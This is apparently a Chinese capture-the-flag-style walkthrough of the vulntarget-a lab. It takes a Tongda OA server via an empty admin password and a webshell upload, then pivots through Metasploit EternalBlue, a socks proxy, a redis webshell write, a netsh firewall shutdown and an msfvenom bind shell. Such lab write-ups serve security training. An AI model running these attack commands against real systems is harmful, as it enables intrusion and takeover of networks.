nmap发现开放80端口



浏览器访问,是通达oa



可以搜索poc或者使用oa利用工具拿到shell

通过账号admin 密码滞空,进入后台



我们这里使用通达OA 11.2 后台getshell

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

点击系统管理 -> 附件管理 -> 添加存储目录

点击组织 -> 系统管理员 -> 上传附件

上传txt文件,抓包修改一句话木马,蚁剑或者哥斯拉连接



路径以及文件地址已给出,自行拼接,蚁剑getshell



信息收集,发现第二张网卡:



可以先让这台机器上线msf,建立路由,进行对20网段的渗透

use exploit/windows/smb/ms17_010_eternalblue

set rhost 192.168.135.152

set lhost 192.168.135.128

set lport 4444

run



添加一下路由



开启一下代理,可以进行内网渗透了

use auxiliary/server/socks_proxy

set srvhost 127.0.0.1

run



利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy

set version 4a

run

redis未授权访问,写入webshell

proxychains4 redis-cli -h 10.0.20.99

config set dir 'C:/phpStudy/PHPTutorial/WWW/'

config set dbfilename shell.php

set 1 ""

save



哥斯拉连接

proxychains4 java -jar godzilla.jar



关闭win2016防火墙,上传msf生成的bind_shell

netsh advfirewall set allprofiles state off #关闭防火墙

msfvenom生成shell

msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe



上传到哥斯拉,并执行

域渗透靶场-vulntarget-a综合靶场的更多相关文章

  1. 初级AD域渗透系列

      net group /domain 获得所有域用户组列表 net group “domain admins” /domain 获得域管理员列表 net group “enterprise admi ...

  2. Metasploit域渗透测试全程实录(终结篇)

    本文作者:i春秋签约作家——shuteer 前言 内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里.于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴 ...

  3. 域渗透基础之NTLM认证协议

    域渗透基础的两个认证协议ntlm和Kerberos协议是必须总结的~ 这篇简单总结下ntlm协议 晚上写下kerberos 0x01 NTLM简介 NTLM使用在Windows NT和Windows ...

  4. 域渗透:SPN(ServicePrincipal Names)的利用

    SPN 简介:服务主体名称(SPN:ServicePrincipal Names)是服务实例(可以理解为一个服务,比如 HTTP.MSSQL)的唯一标识符.Kerberos 身份验证使用 SPN 将服 ...

  5. 域渗透复盘(安洵CTF线下)

    复盘线下域渗透环境Write Up 0x01 外网web到DMZ进域 外网web入口 joomla应用   192.168.0.5 反序列化打下来 GET /index.php HTTP/1.1 Ho ...

  6. AD域渗透总结

    域渗透总结 学习并做了一段时间域网络渗透,给我直观的感受就是思路问题和耐心,这个不像技术研究,需要对一个点进行研究,而是遇到问题后要从多个方面思考,寻找"捷径"思路,只要思路正确, ...

  7. 内网域渗透之MS14-068复现(CVE-2014-6324)

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  8. 内网域渗透之MS14-068复现

    在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...

  9. 域渗透-Kerberos身份验证流程

    域渗透-Kerberos身份验证流程 Kerberos协议框架 在 Kerberos 协议中主要是有三个角色的存在: 1. 访问服务的 Client: 2. 提供服务的 Server: 3.KDC(K ...

  10. Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub

    个人博客阅读体验更佳 本次来试玩一下vulnhub上的Billu_b0x2,下载地址. 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题.靶场推荐使用N ...

随机推荐

  1. Java--文件上传和下载、JavaMail邮件发送

    文件上传 前台: 1. 提交方式:post 2. 表单中有文件上传的表单项: <input type="file" /> 3. 指定表单类型: 默认类型:enctype ...

  2. PDD 笔试反思记录

     一个二叉树的有2016个节点  最多有几个拥有两个子节点的 应该是1007  我擦写错了 第二个求一个直线段的长度  不知道对错 没有参考意义 第三个是输出旋转数组  源码 #include< ...

  3. git代码合并

    首先更新到最新的代码. 把自己的代码cherrypick下来. 修改冲突提交

  4. 一种基于openmv和触摸屏的动态读取颜色的解决方案

    一种基于openmv和触摸屏的动态读取颜色的解决方案 前言: ​ 作为大学生电子设计竞赛控制题选手,常常需要与视觉上位机打交道,openmv作为当前一种开源方案,能够以较低的成本制作,并且官方文档和各 ...

  5. SciTech-EECS-Autosar(自动驾驶)-Hardware:硬件:-EV充电 : 全球充电接口五大标准及控制电路

    SciTech-EECS-Autosar(自动驾驶)-Hardware:硬件: 参考 https://www.chongdiantou.com/archives/360277.html 新能源汽车 指 ...

  6. SciTech-BigDataAIML-LLM-AI换脸:脸部表情实时提取映射另外一张脸(只需要一张脸部照片)

    SciTech-BigDataAIML-LLM-AI换脸 https://github.com/hacksider/Deep-Live-Cam real time face swap and one- ...

  7. win10系统出现电脑关机后自动重启的解决方法

    有msdn官网的用户不知道怎么了,在win10系统中点了关机以后,电脑却直接重启了.小伙伴怀疑是因为一些软件正在运行占用系统资源导致的,所以又在点击关机之前退出了所有软件,但是点击关机后电脑还是又重启 ...

  8. Unity3D 中的简单 Steam 创意工坊实现

    添加 Steamworks 软件包 转到 https://github.com/rlabrecque/Steamworks.NET/releases 并下载最新版本,确保下载 .unitypackag ...

  9. PGSQL 批量更新

    概述 在我们的平常业务中,经常需要批量更新数据,例如:现阶段需要更新 1000 个包裹的上网时间,每个包裹的上网时间是不一样的,假如我们一个一个包裹更新,则需要与数据库进行 1000 次的交互,很大的 ...

  10. 【MySQL】1.基础语句知识

    1.MySQL概述 SQL登录 mysql [-h 127.0.0.1] [-P 3306] -u root -p // 连接mysql SQL语句分类 DDL(Data Definition Lan ...